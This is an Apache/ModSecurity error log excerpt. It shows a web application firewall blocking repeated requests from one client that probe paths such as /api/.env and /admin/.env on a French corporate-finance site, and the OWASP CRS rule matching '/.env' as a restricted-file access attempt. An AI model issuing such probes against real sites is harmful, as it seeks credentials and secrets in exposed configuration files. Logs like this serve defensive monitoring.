[Mon May 11 16:25:28.579645 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.180.54.2:57926] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/app/.env"] [unique_id "agHm2FV4kyjgo4bQBUhT7AAAANM"]
[Mon May 11 16:25:28.826045 2026] [security2:error] [pid 1412074:tid 1412087] [client 18.180.54.2:57930] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/api/.env"] [unique_id "agHm2DJnyuKVXoStDha0QQAAAEs"]
[Mon May 11 16:25:28.826338 2026] [security2:error] [pid 1412074:tid 1412087] [client 18.180.54.2:57930] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/api/.env"] [unique_id "agHm2DJnyuKVXoStDha0QQAAAEs"]
[Mon May 11 16:25:28.826825 2026] [core:error] [pid 1412074:tid 1412087] [client 18.180.54.2:57930] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:28.826987 2026] [security2:error] [pid 1412074:tid 1412087] [client 18.180.54.2:57930] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/api/.env"] [unique_id "agHm2DJnyuKVXoStDha0QQAAAEs"]
[Mon May 11 16:25:29.278459 2026] [security2:error] [pid 1411099:tid 1411106] [client 18.180.54.2:57932] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/apps/.env"] [unique_id "agHm2Q-Qm4vhlWBPlMi5qQAAAAU"]
[Mon May 11 16:25:29.278685 2026] [security2:error] [pid 1411099:tid 1411106] [client 18.180.54.2:57932] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/apps/.env"] [unique_id "agHm2Q-Qm4vhlWBPlMi5qQAAAAU"]
[Mon May 11 16:25:29.279990 2026] [core:error] [pid 1411099:tid 1411106] [client 18.180.54.2:57932] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:29.282593 2026] [security2:error] [pid 1411099:tid 1411106] [client 18.180.54.2:57932] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/apps/.env"] [unique_id "agHm2Q-Qm4vhlWBPlMi5qQAAAAU"]
[Mon May 11 16:25:29.562493 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:57940] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/web/.env"] [unique_id "agHm2VV4kyjgo4bQBUhT7QAAAMo"]
[Mon May 11 16:25:29.562700 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:57940] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/web/.env"] [unique_id "agHm2VV4kyjgo4bQBUhT7QAAAMo"]
[Mon May 11 16:25:29.563177 2026] [core:error] [pid 1416109:tid 1416140] [client 18.180.54.2:57940] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:29.563341 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:57940] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/web/.env"] [unique_id "agHm2VV4kyjgo4bQBUhT7QAAAMo"]
[Mon May 11 16:25:30.003021 2026] [security2:error] [pid 1411055:tid 1411077] [client 18.180.54.2:57944] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/.env"] [unique_id "agHm2kWKUxpmnkK7zHx7lgAAARQ"]
[Mon May 11 16:25:30.003275 2026] [security2:error] [pid 1411055:tid 1411077] [client 18.180.54.2:57944] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/.env"] [unique_id "agHm2kWKUxpmnkK7zHx7lgAAARQ"]
[Mon May 11 16:25:30.003761 2026] [core:error] [pid 1411055:tid 1411077] [client 18.180.54.2:57944] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:30.004586 2026] [security2:error] [pid 1411055:tid 1411077] [client 18.180.54.2:57944] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/.env"] [unique_id "agHm2kWKUxpmnkK7zHx7lgAAARQ"]
[Mon May 11 16:25:30.263486 2026] [security2:error] [pid 1416109:tid 1416142] [client 18.180.54.2:57960] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/site/.env"] [unique_id "agHm2lV4kyjgo4bQBUhT7gAAAMw"]
[Mon May 11 16:25:30.263713 2026] [security2:error] [pid 1416109:tid 1416142] [client 18.180.54.2:57960] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/site/.env"] [unique_id "agHm2lV4kyjgo4bQBUhT7gAAAMw"]
[Mon May 11 16:25:30.264230 2026] [core:error] [pid 1416109:tid 1416142] [client 18.180.54.2:57960] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:30.264395 2026] [security2:error] [pid 1416109:tid 1416142] [client 18.180.54.2:57960] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/site/.env"] [unique_id "agHm2lV4kyjgo4bQBUhT7gAAAMw"]
[Mon May 11 16:25:30.739470 2026] [security2:error] [pid 1412074:tid 1412091] [client 18.180.54.2:57964] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/web/.env"] [unique_id "agHm2jJnyuKVXoStDha0RQAAAE8"]
[Mon May 11 16:25:30.739702 2026] [security2:error] [pid 1412074:tid 1412091] [client 18.180.54.2:57964] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/web/.env"] [unique_id "agHm2jJnyuKVXoStDha0RQAAAE8"]
[Mon May 11 16:25:30.740375 2026] [core:error] [pid 1412074:tid 1412091] [client 18.180.54.2:57964] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:30.741769 2026] [security2:error] [pid 1412074:tid 1412091] [client 18.180.54.2:57964] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/web/.env"] [unique_id "agHm2jJnyuKVXoStDha0RQAAAE8"]
[Mon May 11 16:25:30.985559 2026] [security2:error] [pid 1411055:tid 1411076] [client 18.180.54.2:57968] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/public/.env"] [unique_id "agHm2kWKUxpmnkK7zHx7lwAAARM"]
[Mon May 11 16:25:30.985804 2026] [security2:error] [pid 1411055:tid 1411076] [client 18.180.54.2:57968] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/public/.env"] [unique_id "agHm2kWKUxpmnkK7zHx7lwAAARM"]
[Mon May 11 16:25:30.986299 2026] [core:error] [pid 1411055:tid 1411076] [client 18.180.54.2:57968] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:30.987386 2026] [security2:error] [pid 1411055:tid 1411076] [client 18.180.54.2:57968] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/public/.env"] [unique_id "agHm2kWKUxpmnkK7zHx7lwAAARM"]
[Mon May 11 16:25:31.475039 2026] [security2:error] [pid 1416109:tid 1416137] [client 18.180.54.2:57984] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/site/.env"] [unique_id "agHm21V4kyjgo4bQBUhT7wAAAMc"]
[Mon May 11 16:25:31.475291 2026] [security2:error] [pid 1416109:tid 1416137] [client 18.180.54.2:57984] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/site/.env"] [unique_id "agHm21V4kyjgo4bQBUhT7wAAAMc"]
[Mon May 11 16:25:31.475760 2026] [core:error] [pid 1416109:tid 1416137] [client 18.180.54.2:57984] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:31.475960 2026] [security2:error] [pid 1416109:tid 1416137] [client 18.180.54.2:57984] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/site/.env"] [unique_id "agHm21V4kyjgo4bQBUhT7wAAAMc"]
[Mon May 11 16:25:31.726391 2026] [security2:error] [pid 1412074:tid 1412085] [client 18.180.54.2:57988] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/admin/.env"] [unique_id "agHm2zJnyuKVXoStDha0RgAAAEk"]
[Mon May 11 16:25:31.727749 2026] [security2:error] [pid 1412074:tid 1412085] [client 18.180.54.2:57988] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/admin/.env"] [unique_id "agHm2zJnyuKVXoStDha0RgAAAEk"]
[Mon May 11 16:25:31.728244 2026] [core:error] [pid 1412074:tid 1412085] [client 18.180.54.2:57988] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:31.735652 2026] [security2:error] [pid 1412074:tid 1412085] [client 18.180.54.2:57988] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/admin/.env"] [unique_id "agHm2zJnyuKVXoStDha0RgAAAEk"]
[Mon May 11 16:25:32.214257 2026] [security2:error] [pid 1411201:tid 1411256] [client 18.180.54.2:57998] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/public/.env"] [unique_id "agHm3Py_GXSWIKeli0vx9gAAAIo"]
[Mon May 11 16:25:32.214489 2026] [security2:error] [pid 1411201:tid 1411256] [client 18.180.54.2:57998] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/public/.env"] [unique_id "agHm3Py_GXSWIKeli0vx9gAAAIo"]
[Mon May 11 16:25:32.215307 2026] [core:error] [pid 1411201:tid 1411256] [client 18.180.54.2:57998] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:32.215832 2026] [security2:error] [pid 1411201:tid 1411256] [client 18.180.54.2:57998] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/public/.env"] [unique_id "agHm3Py_GXSWIKeli0vx9gAAAIo"]
[Mon May 11 16:25:32.473343 2026] [security2:error] [pid 1412074:tid 1412090] [client 18.180.54.2:58008] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/backend/.env"] [unique_id "agHm3DJnyuKVXoStDha0SAAAAE4"]
[Mon May 11 16:25:32.473571 2026] [security2:error] [pid 1412074:tid 1412090] [client 18.180.54.2:58008] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/backend/.env"] [unique_id "agHm3DJnyuKVXoStDha0SAAAAE4"]
[Mon May 11 16:25:32.474080 2026] [core:error] [pid 1412074:tid 1412090] [client 18.180.54.2:58008] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:32.474248 2026] [security2:error] [pid 1412074:tid 1412090] [client 18.180.54.2:58008] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/backend/.env"] [unique_id "agHm3DJnyuKVXoStDha0SAAAAE4"]
[Mon May 11 16:25:32.957391 2026] [security2:error] [pid 1411099:tid 1411120] [client 18.180.54.2:58024] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/admin/.env"] [unique_id "agHm3A-Qm4vhlWBPlMi5rAAAABQ"]
